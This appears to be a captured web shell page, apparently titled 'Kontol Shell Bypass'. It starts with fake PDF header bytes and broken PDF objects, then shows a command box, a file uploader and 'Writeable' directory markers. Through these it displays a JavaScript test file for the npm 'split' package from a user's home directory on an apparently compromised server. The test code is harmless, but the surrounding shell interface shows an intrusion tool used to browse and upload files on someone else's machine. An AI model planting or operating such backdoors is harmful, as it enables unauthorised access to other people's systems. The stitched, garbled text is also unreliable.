%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/self/root/home/saurabh/.npm/_npx/249ca9fcd30c476a/node_modules/split/test/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/self/root/home/saurabh/.npm/_npx/249ca9fcd30c476a/node_modules/split/test/split.asynct.js
var es = require('event-stream')
  , it = require('it-is').style('colour')
  , d = require('ubelt')
  , split = require('..')
  , join = require('path').join
  , fs = require('fs')
  , Stream = require('stream').Stream
  , Readable = require('stream').Readable
  , spec = require('stream-spec')
  , through = require('through')
  , stringStream = require('string-to-stream')

exports ['split() works like String#split'] = function (test) {
  var readme = join(__filename)
    , expected = fs.readFileSync(readme, 'utf-8').split('\n')
    , cs = split()
    , actual = []
    , ended = false
    , x = spec(cs).through()

  var a = new Stream ()

  a.write = function (l) {
    actual.push(l.trim())
  }
  a.end = function () {

      ended = true
      expected.forEach(function (v,k) {
        //String.split will append an empty string ''
        //if the string ends in a split pattern.
        //es.split doesn't which was breaking this test.
        //clearly, appending the empty string is correct.
        //tests are passing though. which is the current job.
        if(v)
          it(actual[k]).like(v)
      })
      //give the stream time to close
      process.nextTick(function () {
        test.done()
        x.validate()
      })
  }
  a.writable = true

  fs.createReadStream(readme, {flags: 'r'}).pipe(cs)
  cs.pipe(a)

}

exports ['split() takes mapper function'] = function (test) {
  var readme = join(__filename)
    , expected = fs.readFileSync(readme, 'utf-8').split('\n')
    , cs = split(function (line) { return line.toUpperCase() })
    , actual = []
    , ended = false
    , x = spec(cs).through()

  var a = new Stream ()

  a.write = function (l) {
    actual.push(l.trim())
  }
  a.end = function () {

      ended = true
      expected.forEach(function (v,k) {
        //String.split will append an empty string ''
        //if the string ends in a split pattern.
        //es.split doesn't which was breaking this test.
        //clearly, appending the empty string is correct.
        //tests are passing though. which is the current job.
        if(v)
          it(actual[k]).equal(v.trim().toUpperCase())
      })
      //give the stream time to close
      process.nextTick(function () {
        test.done()
        x.validate()
      })
  }
  a.writable = true

  fs.createReadStream(readme, {flags: 'r'}).pipe(cs)
  cs.pipe(a)

}

exports ['split() works with empty string chunks'] = function (test) {
  var str = ' foo'
    , expected = str.split(/[\s]*/).reduce(splitBy(/[\s]*/), [])
    , cs1 = split(/[\s]*/)
    , cs2 = split(/[\s]*/)
    , actual = []
    , ended = false
    , x = spec(cs1).through()
    , y = spec(cs2).through()

  var a = new Stream ()

  a.write = function (l) {
    actual.push(l.trim())
  }
  a.end = function () {

      ended = true
      expected.forEach(function (v,k) {
        //String.split will append an empty string ''
        //if the string ends in a split pattern.
        //es.split doesn't which was breaking this test.
        //clearly, appending the empty string is correct.
        //tests are passing though. which is the current job.
        if(v)
          it(actual[k]).like(v)
      })
      //give the stream time to close
      process.nextTick(function () {
        test.done()
        x.validate()
        y.validate()
      })
  }
  a.writable = true

  cs1.pipe(cs2)
  cs2.pipe(a)

  cs1.write(str)
  cs1.end()

}

function splitBy (delimiter) {
  return function (arr, piece) {
    return arr.concat(piece.split(delimiter))
  }
}

Kontol Shell Bypass